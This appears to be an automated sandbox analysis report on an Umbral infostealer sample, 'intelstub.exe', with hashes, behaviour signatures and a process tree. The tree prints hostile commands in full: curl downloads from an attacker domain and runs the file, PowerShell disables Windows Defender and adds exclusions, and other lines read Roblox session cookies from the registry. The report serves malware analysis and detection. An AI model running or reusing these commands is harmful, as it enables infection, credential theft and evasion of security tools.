Resubmissions
08-12-2024 02:44
241208-c76qvsykax 1008-12-2024 02:42
241208-c7bwgstldm 1008-12-2024 02:40
241208-c6dcxstlal 1008-12-2024 02:37
241208-c4lxaaxrcv 10Analysis
-
max time kernel
61s -
max time network
63s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
08-12-2024 02:40
Static task
static1
Behavioral task
behavioral1
Sample
intelstub.exe
Resource
win10ltsc2021-20241023-en
General
-
Target
intelstub.exe
-
Size
45KB
-
MD5
46dad3f34a1ff25b259446bac02cca4a
-
SHA1
08be9e8701d40bb0d968106793480eeb25adeb26
-
SHA256
9bf776f889b56b90ef2cbe8cd971c68290f79374b7a7dcfa100e71a1cd45bd03
-
SHA512
67338468551bc926a88b8e40f40177dea339debd701ad463f9e2cb763cf82f755743f3ee82c3626aa326c820afb93020d0d9526fc38affcb9b3af92725b393f6
-
SSDEEP
768:R4yvRGAc8gygFxLgkzLQgzcOybPofSzVxsBKfwJlVE3iPmbL52:9c8Oxz8YcO+A6zV4Kfd7
Malware Config
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x00290000000450bf-13.dat family_umbral behavioral1/memory/100-15-0x000002281FC30000-0x000002281FC70000-memory.dmp family_umbral -
Umbral family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 832 powershell.exe 3228 powershell.exe 4380 powershell.exe 4500 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 100 IntelSoftwareAssetManagerService.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 ipinfo.io 22 ipinfo.io 23 ip-api.com -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\IME\zvcjd0.pfx curl.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2680 wmic.exe -
Suspicious behavior: EnumeratesProcesses 36 IoCs
pid Process 2356 wmic.exe 2356 wmic.exe 2356 wmic.exe 2356 wmic.exe 100 IntelSoftwareAssetManagerService.exe 4140 wmic.exe 4140 wmic.exe 4140 wmic.exe 4140 wmic.exe 100 IntelSoftwareAssetManagerService.exe 832 powershell.exe 832 powershell.exe 3228 powershell.exe 3228 powershell.exe 4380 powershell.exe 4380 powershell.exe 1344 powershell.exe 1344 powershell.exe 2828 wmic.exe 2828 wmic.exe 2828 wmic.exe 2828 wmic.exe 2320 wmic.exe 2320 wmic.exe 2320 wmic.exe 2320 wmic.exe 2092 wmic.exe 2092 wmic.exe 2092 wmic.exe 2092 wmic.exe 4500 powershell.exe 4500 powershell.exe 2680 wmic.exe 2680 wmic.exe 2680 wmic.exe 2680 wmic.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2356 wmic.exe Token: SeSecurityPrivilege 2356 wmic.exe Token: SeTakeOwnershipPrivilege 2356 wmic.exe Token: SeLoadDriverPrivilege 2356 wmic.exe Token: SeSystemProfilePrivilege 2356 wmic.exe Token: SeSystemtimePrivilege 2356 wmic.exe Token: SeProfSingleProcessPrivilege 2356 wmic.exe Token: SeIncBasePriorityPrivilege 2356 wmic.exe Token: SeCreatePagefilePrivilege 2356 wmic.exe Token: SeBackupPrivilege 2356 wmic.exe Token: SeRestorePrivilege 2356 wmic.exe Token: SeShutdownPrivilege 2356 wmic.exe Token: SeDebugPrivilege 2356 wmic.exe Token: SeSystemEnvironmentPrivilege 2356 wmic.exe Token: SeRemoteShutdownPrivilege 2356 wmic.exe Token: SeUndockPrivilege 2356 wmic.exe Token: SeManageVolumePrivilege 2356 wmic.exe Token: 33 2356 wmic.exe Token: 34 2356 wmic.exe Token: 35 2356 wmic.exe Token: 36 2356 wmic.exe Token: SeIncreaseQuotaPrivilege 2356 wmic.exe Token: SeSecurityPrivilege 2356 wmic.exe Token: SeTakeOwnershipPrivilege 2356 wmic.exe Token: SeLoadDriverPrivilege 2356 wmic.exe Token: SeSystemProfilePrivilege 2356 wmic.exe Token: SeSystemtimePrivilege 2356 wmic.exe Token: SeProfSingleProcessPrivilege 2356 wmic.exe Token: SeIncBasePriorityPrivilege 2356 wmic.exe Token: SeCreatePagefilePrivilege 2356 wmic.exe Token: SeBackupPrivilege 2356 wmic.exe Token: SeRestorePrivilege 2356 wmic.exe Token: SeShutdownPrivilege 2356 wmic.exe Token: SeDebugPrivilege 2356 wmic.exe Token: SeSystemEnvironmentPrivilege 2356 wmic.exe Token: SeRemoteShutdownPrivilege 2356 wmic.exe Token: SeUndockPrivilege 2356 wmic.exe Token: SeManageVolumePrivilege 2356 wmic.exe Token: 33 2356 wmic.exe Token: 34 2356 wmic.exe Token: 35 2356 wmic.exe Token: 36 2356 wmic.exe Token: SeDebugPrivilege 100 IntelSoftwareAssetManagerService.exe Token: SeIncreaseQuotaPrivilege 4140 wmic.exe Token: SeSecurityPrivilege 4140 wmic.exe Token: SeTakeOwnershipPrivilege 4140 wmic.exe Token: SeLoadDriverPrivilege 4140 wmic.exe Token: SeSystemProfilePrivilege 4140 wmic.exe Token: SeSystemtimePrivilege 4140 wmic.exe Token: SeProfSingleProcessPrivilege 4140 wmic.exe Token: SeIncBasePriorityPrivilege 4140 wmic.exe Token: SeCreatePagefilePrivilege 4140 wmic.exe Token: SeBackupPrivilege 4140 wmic.exe Token: SeRestorePrivilege 4140 wmic.exe Token: SeShutdownPrivilege 4140 wmic.exe Token: SeDebugPrivilege 4140 wmic.exe Token: SeSystemEnvironmentPrivilege 4140 wmic.exe Token: SeRemoteShutdownPrivilege 4140 wmic.exe Token: SeUndockPrivilege 4140 wmic.exe Token: SeManageVolumePrivilege 4140 wmic.exe Token: 33 4140 wmic.exe Token: 34 4140 wmic.exe Token: 35 4140 wmic.exe Token: 36 4140 wmic.exe -
Suspicious use of WriteProcessMemory 40 IoCs
description pid Process procid_target PID 476 wrote to memory of 2388 476 intelstub.exe 81 PID 476 wrote to memory of 2388 476 intelstub.exe 81 PID 2388 wrote to memory of 3704 2388 cmd.exe 82 PID 2388 wrote to memory of 3704 2388 cmd.exe 82 PID 476 wrote to memory of 4968 476 intelstub.exe 83 PID 476 wrote to memory of 4968 476 intelstub.exe 83 PID 4968 wrote to memory of 4164 4968 cmd.exe 84 PID 4968 wrote to memory of 4164 4968 cmd.exe 84 PID 476 wrote to memory of 3468 476 intelstub.exe 85 PID 476 wrote to memory of 3468 476 intelstub.exe 85 PID 476 wrote to memory of 1788 476 intelstub.exe 86 PID 476 wrote to memory of 1788 476 intelstub.exe 86 PID 1788 wrote to memory of 228 1788 cmd.exe 87 PID 1788 wrote to memory of 228 1788 cmd.exe 87 PID 476 wrote to memory of 2328 476 intelstub.exe 88 PID 476 wrote to memory of 2328 476 intelstub.exe 88 PID 2328 wrote to memory of 100 2328 cmd.exe 89 PID 2328 wrote to memory of 100 2328 cmd.exe 89 PID 100 wrote to memory of 2356 100 IntelSoftwareAssetManagerService.exe 90 PID 100 wrote to memory of 2356 100 IntelSoftwareAssetManagerService.exe 90 PID 100 wrote to memory of 4140 100 IntelSoftwareAssetManagerService.exe 95 PID 100 wrote to memory of 4140 100 IntelSoftwareAssetManagerService.exe 95 PID 100 wrote to memory of 832 100 IntelSoftwareAssetManagerService.exe 97 PID 100 wrote to memory of 832 100 IntelSoftwareAssetManagerService.exe 97 PID 100 wrote to memory of 3228 100 IntelSoftwareAssetManagerService.exe 101 PID 100 wrote to memory of 3228 100 IntelSoftwareAssetManagerService.exe 101 PID 100 wrote to memory of 4380 100 IntelSoftwareAssetManagerService.exe 103 PID 100 wrote to memory of 4380 100 IntelSoftwareAssetManagerService.exe 103 PID 100 wrote to memory of 1344 100 IntelSoftwareAssetManagerService.exe 105 PID 100 wrote to memory of 1344 100 IntelSoftwareAssetManagerService.exe 105 PID 100 wrote to memory of 2828 100 IntelSoftwareAssetManagerService.exe 107 PID 100 wrote to memory of 2828 100 IntelSoftwareAssetManagerService.exe 107 PID 100 wrote to memory of 2320 100 IntelSoftwareAssetManagerService.exe 109 PID 100 wrote to memory of 2320 100 IntelSoftwareAssetManagerService.exe 109 PID 100 wrote to memory of 2092 100 IntelSoftwareAssetManagerService.exe 111 PID 100 wrote to memory of 2092 100 IntelSoftwareAssetManagerService.exe 111 PID 100 wrote to memory of 4500 100 IntelSoftwareAssetManagerService.exe 113 PID 100 wrote to memory of 4500 100 IntelSoftwareAssetManagerService.exe 113 PID 100 wrote to memory of 2680 100 IntelSoftwareAssetManagerService.exe 116 PID 100 wrote to memory of 2680 100 IntelSoftwareAssetManagerService.exe 116 -
cURL User-Agent 2 IoCs
Uses User-Agent string associated with cURL utility.
description flow ioc HTTP User-Agent header 4 curl/8.7.1 HTTP User-Agent header 17 curl/8.7.1
Processes
-
C:\Users\Admin\AppData\Local\Temp\intelstub.exe"C:\Users\Admin\AppData\Local\Temp\intelstub.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:476 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://cdn.z60ic9762h.click/zvcjd0.pfx -o C:\Windows\IME\zvcjd0.pfx --silent2⤵
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Windows\system32\curl.execurl https://cdn.z60ic9762h.click/zvcjd0.pfx -o C:\Windows\IME\zvcjd0.pfx --silent3⤵
- Drops file in Windows directory
PID:3704
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -importpfx -p your_password C:\Windows\IME\zvcjd0.pfx NoExport2⤵
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\Windows\system32\certutil.execertutil -importpfx -p your_password C:\Windows\IME\zvcjd0.pfx NoExport3⤵PID:4164
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /F /Q C:\Windows\IME\zvcjd0.pfx2⤵PID:3468
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl https://cdn.z60ic9762h.click/abc.bin -o C:\Users\Public\Documents\IntelSoftwareAssetManagerService.exe --silent2⤵
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\system32\curl.execurl https://cdn.z60ic9762h.click/abc.bin -o C:\Users\Public\Documents\IntelSoftwareAssetManagerService.exe --silent3⤵PID:228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Users\Public\Documents\IntelSoftwareAssetManagerService.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Users\Public\Documents\IntelSoftwareAssetManagerService.exeC:\Users\Public\Documents\IntelSoftwareAssetManagerService.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:100 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2356
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\IntelSoftwareAssetManagerService.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:832
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 24⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1344
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2828
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2320
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4500
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious behavior: EnumeratesProcesses
PID:2680
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD5193ac0692b1c11b72698e64328605cb6
SHA1862309634eb76cc236638a32b6411dc114d8f3c1
SHA256dcb192355039c92f99ba44886e4e991b8f996af81b3ad154ea2b7603f93ed1d0
SHA512df32ce2220e950f8fabc7f313255baec0bea3a4cd5f16b038ecd361e71f582739716707f2d51cc0e01ae8a3960d426f3d4ed3c08f94eae2ce3b87bcfbc7912a5
-
Filesize
948B
MD5862e4e85164c5e59feef404dbfd5aa60
SHA1dced1ebb827f35f0f1bfd1b96ba24374393353b7
SHA256bf93d4e58968da369ead6058b1f811246415c4f55cfa74b2fa950e6adcb24d88
SHA512dab6c3b6bff7a2248637a7a20c2a564e45f6278fcd2610bdb807df3d232b3851409e6007a90ea5e3d50da3e6ba46af8a2a3864133457a20b69fb567f5d6eef41
-
Filesize
1KB
MD58e1fdd1b66d2fee9f6a052524d4ddca5
SHA10a9d0994559d1be2eecd8b0d6960540ca627bdb6
SHA2564cc7c1b79d1b48582d4dc27ca8c31457b9bf2441deb7914399bb9e6863f18b13
SHA5125a5494b878b08e8515811ab7a3d68780dac7423f5562477d98249a8bedf7ec98567b7cd5d4c6967d6bc63f2d6d9b7da9a65e0eb29d4b955026b469b5b598d1f3
-
Filesize
1KB
MD5092342afeeaa935bd53f93354d7dc9bd
SHA1644881575abf5e4e0f291e3dc6d882f30b1380c6
SHA256eba4a21dd48f30f505d787231df82a58b7e840ad5c610eea99280710f87e76f1
SHA512dfac71939dbc094e9a3b7dca0c714fe4a0662fb133a44349c85da016256c7a2222f621aa04cd67a1942cb087cda46f3fb98c943e883d34d3c1db286d6ef1cadc
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
238KB
MD566574582c2e810055676407bdd671636
SHA171a07c0906e65524d6844aa0a65e90ee682eb6c5
SHA2565a05e0c1a7b22baaaa9268ef6f0d9a5524826fdc3871a59c5134f7354baa9346
SHA51204c5dc624009d1127319f0f32c137a4bab6b1aec10e3fd5fdad4372c8a09b8f894980834d6d0d5ee3920ccb3aa3d3e84fe6e1010b6b6dabdb6c20e2f047b5341
-
Filesize
2KB
MD5044c6ed5926cda780ca3506829585245
SHA1b958068c7f440fffd712e9a0704f5234537b22d4
SHA25621115f915d5e38fb38be88a627010d39cb7e4b0008854530e3a8fa117f45cfea
SHA5124d00d57e4f0e12c01d5455cf81f685b04b9446aa026b8579009a271dab5eacc298530625e995ff910a9cc6442392fd2098d517b86b7ad0f713f689324e5f0601